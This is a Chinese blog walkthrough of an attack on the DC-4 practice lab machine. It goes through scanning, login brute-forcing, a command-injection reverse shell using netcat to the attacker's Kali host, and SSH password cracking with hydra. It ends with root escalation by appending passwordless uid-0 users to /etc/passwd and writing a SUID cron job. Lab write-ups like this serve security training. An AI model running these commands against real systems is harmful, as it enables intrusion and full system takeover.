靶机所需环境
- 目标靶机:DC-4(192.168.160.178)
- 攻击机:Kali Linux(192.168.160.176)
信息收集
- 还是常规的扫描一下存活主机叭,这次咱使用刚学到的新命令扫描下;
nmap -sP IP网段
- 使用masscan扫描目标端口可以提高准确性
-p
参数指定端口范围,--rate
参数指定速度;
masscan 192.168.160.178 -p1-65535 --rate=100000
- 访问靶机下的80端口,看到一个登录框;
- 记住一般只要有登录框就会存在admin管理员,使用
Burp
爆破,由于过程比较久这里就不演示了哈😂,成功爆破出密码;
用户: admin
密码: happy
- 对
Command
页面进行了下测试,发现这里存在一个命令执行;
漏洞利用
- 尝试反弹shell,页面抓包;
- kali监听端口1234,
Burp
修改命令执行反弹操作;
kali: nc -lvp 1234
nc+-e+/bin/bash+192.168.160.176+1234
- 成功反弹至kali上,执行命令进行交互;
python -c "import pty;pty.spawn('/bin/bash')"
用户大比拼
- 进入
/home
家目录寻找信息,发现jim
用户里存在密码备份文件;
- 复制密码保存为
passwords.txt
文件,kali新开个窗口使用hydra
成功爆破出密码;
用户: jim 密码: jibril04
//注: 密码那个是小写的l,不是数字1;
hydra -l jim -P passwords.txt ssh://192.168.160.178:22
- 那就远程一下
jim
用户叭;
ssh jim@192.168.160.178
- 瞎逛了一圈后发现个
mail
邮件,进入/var/mail
目录下,查看邮件发现了charles
用户的密码;(小插曲:这年头学个信安不会英语还真不行😭)
用户: charles
密码: ^xHhA&hvim0y
- 尝试切换至
charles
用户不知道啥子原因被拒绝了,但执行su
命令成功;
- 在
/home
目录下没找到什么有用信息,看下sudo
能执行命令或文件,发现有个teehee
命令;
知识小拓展
teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权;
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目;
权限提升
方法一(添加用户/etc/passwd)
无密码版
- 查看
/etc/passwd
密码文件,复制root
信息;
root用户: root:x:0:0:root:/root:/bin/bash
//仿造一份hack用户的,记得删除x;
hack用户: hack::0:0:root:/root:/bin/bash
- 使用
teehee
命令添加hack
用户至密码文件;
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
- 执行
su
命令成功提权至root
;
有密码版
- 其实都差不多呢,使用
perl
命令生成密码,添加Joker
用户至密码文件;
生成密码: perl -le 'print crypt("123456", "aa")'
echo "Joker:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/pass
wd
- 执行
su
命令输入密码123456
成功提权至root
;
方法二(定时任务)
- 通过执行的脚本给/bin/sh赋予SUID权限,这样就可以在非root用户下执行它,并且执行期间拥有root权限;
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
- 查看权限发现成功写入了
suid
权限,执行/bin/sh
成功提至root
权限;
上一篇 > DC-3靶机渗透测试
下一篇 > DC-5靶机渗透测试
以上内容就是DC-4靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!
以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍